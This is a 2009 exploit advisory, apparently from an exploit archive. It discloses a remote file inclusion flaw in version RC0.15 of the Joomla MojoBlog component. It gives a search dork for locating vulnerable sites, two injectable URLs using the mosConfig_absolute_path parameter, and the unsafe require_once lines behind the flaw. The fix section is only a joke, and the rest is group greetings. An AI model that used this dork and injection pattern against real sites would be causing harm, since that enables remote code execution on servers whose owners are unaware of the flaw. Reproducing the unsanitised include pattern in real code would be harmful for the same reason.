######################################################################### ## Joomla Component MojoBlog Multiple Remote File Include vulnerability # ## Author : kaMtiEz (kamzcrew@yahoo.com) # ## Homepage : http://www.indonesiancoder.com # ## Date : November 20, 2009 # ######################################################################### [ Software Information ] [+] Vendor : http://www.joomlify.com/ [+] Download : http://www.joomlify.com/files/mojoblog/ [+] version : RC0.15 [+] Vulnerability : RFI [+] price : FREE [+] Dork : inurl:"com_mojo" [+] Location : INDONESIA - JOGJA ######################################################################### [ Vulnerable File ] http://127.0.0.1/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L] http://127.0.0.1/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L] [ BUG IN ] [1] wp-comments-post.php [2] wp-trackback.php ====================== [1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php'); [2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php'); [ FIX ] contact me .. or aurakasih .. Joke.. ;) ######################################################################### [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW [+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h [+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz [+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!! [ NOTE ] [+] one day .. u will be mind .. [+] bangun tidur coba mencari celah .. dapet juga ,, :D [+] aurakasih .. aku butuh kamuwh .. hha [+] om tukulesto kapan ke kotaku ?? hha